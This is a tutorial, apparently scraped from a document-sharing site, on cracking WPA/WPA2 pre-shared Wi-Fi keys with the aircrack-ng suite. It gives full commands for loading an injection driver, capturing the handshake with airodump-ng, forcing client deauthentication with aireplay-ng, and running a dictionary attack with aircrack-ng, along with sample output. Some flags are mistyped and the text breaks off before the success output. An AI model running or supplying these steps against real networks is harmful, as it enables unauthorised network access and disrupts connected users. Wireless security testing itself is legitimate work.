Hack Wpa Tkip and Aes

Download as pdf or txt
Download as pdf or txt
You are on page 1of 9

Crack WPA/TKIP or AES (WPA2 Enterprise or 802.1x : username/pass : very secure) 0.

Configure WPA TKIP/AES authenticate from AP and Client

WPA key : 8 to 63 character Enter the 12345678 on the Network key box 1. Mount USB Drive mkdir /mnt/usb mount /dev/sdb1 /mnt/usb

2. Copy file ipwraw-ng.lzm to /tmp directoty cd /mnt/usb/ cp ipwraw-ng.lzm.bz2 /tmp cd /tmp mv ipwraw-ng.lzm.bz2 ipwraw-ng.lzm lzm2dir ipwraw-ng.lzm / 3. Install ipw3945 driver this will unpack the drivers needed, and create a subdirectory named "ipwraw" in the /tmp directory. now we install it, so we do: cd /tmp/ipwraw make make install

4. Unload old driver and load new driver ipw3945 the required drivers should now be installed. NOW YOU HAVE TWO DRIVERS FOR YOUR CARD, the original ipw3945 and the ipwraw drivers. To check if the new ones are working, be sure that your other ipw3945 drivers are not loaded, so do this: /sbin/modprobe -r ipw3945 /usr/src/drivers/ipw3945-1.2.0/unload /tmp/ipwraw/load This should get up a message saying "Interface up as rtap0 and ready for application connection". iwconfig will show you a wifi and rtap interface you can try out for injection

Write MAC Address Client /AP in the BT to copy (MAC Client MAC AP ). Change to : 00:1B:77:60:18:E5 00:1C:10:62:69:D8

WPA Handshake capture (airoplay) (WPA-PSK) Start airodump-ng to collect authentication handshake. 5. Using Airodump to Collect Packets from the WLAN airodump-ng c11 --bssid 00:1C:10:62:69:D8 -w psk wifi0

Where: -c 11 is the channel for the wireless network - -bssid 00:1C:10:62:69:D8 is the access point MAC address. This eliminate extraneous traffic. -w psk is the file name prefix for the file which will contain the IVs. wifi0 is the interface name. Important: Do NOT use the - -ivs option. You must capture the full packets. Use aireplay-ng to deauthenticate the wireless client This step is optional. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then move onto the next step and be patient. Needless to say, if a wireless client shows up later, you can backtrack and perform this step. What this step does is send a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter: aireplay-ng -0 10 -a 00:1C:10:62:69:D8 c 00:1B:77:60:18:E5 wifi0 Where: -0 means deauthentication 1 is the number of deauths to send (you can send muliple if you wish) -a 00:1C:10:62:69:D8 is the MAC address of the access point -c 00:1B:77:60:18:E5 is the MAC address of the client you are deauthing wifi0 is the interface name aireplay-ng -0 10 -a 00:1C:10:62:69:D8 c 00:1B:77:60:18:E5 wifi0

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. Run aircrack-ng to crack the pre-shared key The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - password.lst. This file can be found in the test directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial. aircrack-ng -w /mnt/usb/wordlists.lst -b 00:1C:10:62:69:D8 psk*.cap

Where: -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory. *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files. Here is typical output when there are no handshakes found: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. No valid WPA handshakes found. When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP. Here is typical output when handshakes are found: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. # BSSID ESSID Encryption WPA (1 handshake)

1 00:1C:10:62:69:D8 scnp Choosing first network as target. ls l (> 200000 to 500000 IV)

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days. Here is what successfully cracking the pre-shared key looks like:

You might also like